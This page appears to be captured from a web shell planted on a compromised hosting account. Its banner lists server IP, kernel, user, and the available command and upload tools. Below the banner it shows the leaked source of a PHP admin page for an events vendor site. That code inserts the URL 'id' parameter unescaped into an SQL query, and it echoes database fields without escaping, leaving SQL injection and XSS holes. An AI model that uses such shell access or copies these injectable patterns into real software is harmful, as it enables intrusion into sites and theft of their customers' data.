Server IP : 162.214.80.37 / Your IP : 216.73.216.83 Web Server : Apache System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : imyrqtmy ( 2189) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/imyrqtmy/public_html/eventsbyshubhchintak/admin/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include'loginQuery/session_start.php'; include'dbc.php'; $pageTitle="List of Lisitng Enquiry"; $pageName="Lisitng Enquiry List"; $linkName="Add Vendor"; $tableName="tbl_listing_enquiry"; $addPageUrl="vendor.php"; $deleteMode="deleteVendor"; $getlistingenqid=$_GET['id']; $sqllistingenq=mysqli_query($conn,"select * from tbl_listing_enquiry where id='$getlistingenqid'")or die(mysqli_error()); $rowlisitngenq=mysqli_fetch_assoc($sqllistingenq); extract($rowlisitngenq); $sqlCS=mysqli_query($conn,"select * from tbl_subcategory") or die(mysqli_error($conn)); while($rowsc=mysqli_fetch_assoc($sqlCS)){ $subcategoryNameAry[$rowsc['id']]=$rowsc['name']; } ?> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <!-- Page title --> <title><?php echo $pageName; ?> | <?php echo $companyName; ?></title> <!-- Vendor styles --> <link rel="stylesheet" href="vendor/fontawesome/css/font-awesome.css" /> <link rel="stylesheet" href="vendor/metisMenu/dist/metisMenu.css" /> <link rel="stylesheet" href="vendor/animate.css/animate.css" /> <link rel="stylesheet" href="vendor/bootstrap/dist/css/bootstrap.css" /> <link rel="stylesheet" href="vendor/datatables.net-bs/css/dataTables.bootstrap.min.css" /> <link rel="stylesheet" href="vendor/toastr/build/toastr.min.css" /> <!-- App styles --> <link rel="stylesheet" href="fonts/pe-icon-7-stroke/css/pe-icon-7-stroke.css" /> <link rel="stylesheet" href="fonts/pe-icon-7-stroke/css/helper.css" /> <link rel="stylesheet" href="styles/style.css"> <link rel="stylesheet" href="styles/static_custom.css"> </head> <body class="fixed-small-header light-skin fixed-navbar sidebar-scroll"> <!-- Header --> <!-- Header --> <?php include 'includes/header.php'; ?> <!-- Navigation --> <?php include 'includes/sidemenu.php'; ?> <!-- Main Wrapper --> <div id="wrapper"> <div class="small-header"> <div class="hpanel"> <div class="panel-body"> <h2 class="font-light m-b-xs"> View Vendor Detail </h2> <small><a href="home.php">Dashboard</a></small> </div> </div> </div> <div class="content"> <div class="row"> <div class="col-lg-12"> <div class="hpanel"> <div class="panel-body"> <table class="table table-striped table-bordered table-hover"> <tr> <th>Vendor Name</th> <th><?php echo $vendorname; ?> / <?php echo $subcategoryNameAry[$vendorsubcateid];?></th> </tr> <tr> <th>Enquiry Date</th> <th><?php echo $enquirydate; ?></th> </tr> <tr> <th>Name</th> <td><?php echo $rowlisitngenq['name'];?></td> </tr> <tr> <th>Mobile</th> <td><?php echo $mobile; ?></td> </tr> <tr> <th>Email</th> <td><?php echo $email; ?></td> </tr> <tr> <th>Function Date</th> <td><?php echo $functiondate;?></td> </tr> <tr> <th>Event Description</th> <td><?php echo $descc;?></td> </tr> </table> </div> </div> </div> </div> </div> <!-- Footer--> <?php include 'includes/footer.php'; ?> </div> <!-- Vendor scripts --> <script src="vendor/jquery/dist/jquery.min.js"></script> <script src="vendor/jquery-ui/jquery-ui.min.js"></script> <script src="vendor/slimScroll/jquery.slimscroll.min.js"></script> <script src="vendor/bootstrap/dist/js/bootstrap.min.js"></script> <script src="vendor/metisMenu/dist/metisMenu.min.js"></script> <script src="vendor/iCheck/icheck.min.js"></script> <script src="vendor/sparkline/index.js"></script> <!-- DataTables --> <script src="vendor/datatables/media/js/jquery.dataTables.min.js"></script> <script src="vendor/datatables.net-bs/js/dataTables.bootstrap.min.js"></script> <!-- DataTables buttons scripts --> <script src="vendor/pdfmake/build/pdfmake.min.js"></script> <script src="vendor/pdfmake/build/vfs_fonts.js"></script> <script src="vendor/datatables.net-buttons/js/buttons.html5.min.js"></script> <script src="vendor/datatables.net-buttons/js/buttons.print.min.js"></script> <script src="vendor/datatables.net-buttons/js/dataTables.buttons.min.js"></script> <script src="vendor/datatables.net-buttons-bs/js/buttons.bootstrap.min.js"></script> <script src="vendor/toastr/build/toastr.min.js"></script> <!-- App scripts --> <script src="scripts/homer.js"></script> <?php include 'message.php'; ?> <script> $(function () { // Initialize Example 2 $('#example1').dataTable(); }); </script> <link rel="stylesheet" href="vendor/sweetalert/lib/sweet-alert.css" /> <script src="vendor/sweetalert/lib/sweet-alert.min.js"></script> <script> $(document).on('click','.demo3',function(){ var path=$(this).attr('path'); swal({ title: "Are you sure?", text: "Your will not be able to recover this imaginary file!", type: "warning", showCancelButton: true, confirmButtonColor: "#DD6B55", confirmButtonText: "Yes, delete it!" }, function () { window.location.href=path }); }); </script> </body> </html>